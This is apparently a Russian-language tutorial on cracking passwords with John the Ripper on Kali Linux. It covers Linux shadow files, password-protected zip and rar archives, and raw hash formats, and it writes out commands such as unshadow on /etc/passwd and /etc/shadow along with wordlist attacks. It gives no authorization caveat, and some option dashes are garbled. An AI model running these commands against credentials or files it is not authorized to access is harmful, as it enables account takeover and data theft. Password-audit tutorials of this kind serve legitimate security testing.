                                Если вы пользуетесь Kali Linux не первый день, то вы знаете, что в этой ОС пароли хранятся в теневом файле, который хеширован и защищен. Кроме того, вы не можете напрямую просматривать файлы. Но с Джоном это становится выполнимым, потому что теперь получить доступ к паролю Linux можно за считанные минуты.
                                Чтобы взломать пароль Linux с помощью John The Ripper, введите в терминале следующую команду:
                                • unshadow /etc/passwd /etc/shadow > crack.txt

                                unshadow — это команда, которая может извлекать хеши и отправлять их в файл crack.txt. Джон может использовать эти файлы с сохраненными хэшами для их взлома.
                                В зависимости от сложности пароля время, необходимое для его взлома, будет меняться. Кроме того, если вы используете список слов, пароль должен присутствовать в списке слов.
                                Если вы не видите пароль или хотите увидеть его снова, введите следующую команду:
                                • cat /root/.john/john.pot

                                Где test123 это пароль
                                Примечание: Имейте ввиду, что взлом пароля требует больших ресурсов, поэтому ваши ПК могут нагреваться, если нет надлежащего охлаждения.
                                2. Взлом файлов Zip и Rar, защищенных паролем

                                Мы довольно часто сталкиваемся с запароленными zip-файлами, в частности, если загружаем что-то из Интернета. Так, давайте попробуем взломать пароль zip-файла.
                                Откройте папку, в которой находится zip-файл. В терминале смените каталог с помощью команды cd и введите следующую команду:
                                • zip2john file > output.txt

                                file = имя zip файла
                                После использования этой команды вы увидите файл output.txt, в котором хранятся хэши zip-файла.
                                Чтобы взломать хэш zip-файла, введите:
                                • john –format=zip output.txt

                                С помощью этой команды начнется процесс взлома zip пароля. Обратите внимание, что это займет N-время, в зависимости от сложности пароля.
                                В случае взлома паролей файлов «rar» просто замените «zip» на «rar». Например:
                                • rar2john file > output.txt
                                • John –format=rar output.txt

                                Все остальные действия остаются неизменными.
                                3. Расшифровка хеш-файлов

                                В качестве подготовки вам нужно сохранить хэш, который вы хотите расшифровать, в текстовом файле. Теперь давайте воспользуемся Джоном для расшифровки хэша и доступа к паролю.
                                Чтобы расшифровать его, используйте LM Хэши:
                                SHA1
                                Чтобы расшифровать SHA1, мы будем использовать RockYou из списка слов и взламывать пароль, как показано ниже:
                                • john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha1 crack.txt

                                SHA256
                                • john –wordlist=/usr/share/wordlists/rockyou.txt –format=raw-sha256 crack.txt

                                MD5
                                • john –format=raw-md5 hash.txt

                                Подождите, пока файл хэша будет расшифрован. Как только файл будет расшифрован, вы увидите пароль.
                                Чтобы просмотреть все форматы, поддерживаемые john, введите следующую команду:
                                • john –list=formats

                                4. Использование пользовательского списка слов для взлома паролей

                                Если вы хотите применить атаку по списку слов, то это займет у вас много времени и сил. Однако, вы можете облегчить себе задачу с помощью Джона Потрошителя, который использует пользовательский словарь, содержащий список наиболее часто используемых паролей по всему миру. Введите:
                                • john –format=raw-sha1 –wordlist password.txt THEHASHFILE.txt

                                Вы можете также попробовать и следующую команду:
                                • john –wordlist=/usr/share/john/password.lst hashfile

                                Здесь, в приведенной выше команде, мы использовали файл password.lst. Но вы можете использовать любой файл, какой захотите.
                                Вот вы и научились использовать инструмент John The Ripper для взлома паролей. На этом всё. Надеемся, что данная статья оказалась полезной для вас. Удачи!

                                Комментарий

                                Обработка...
                                X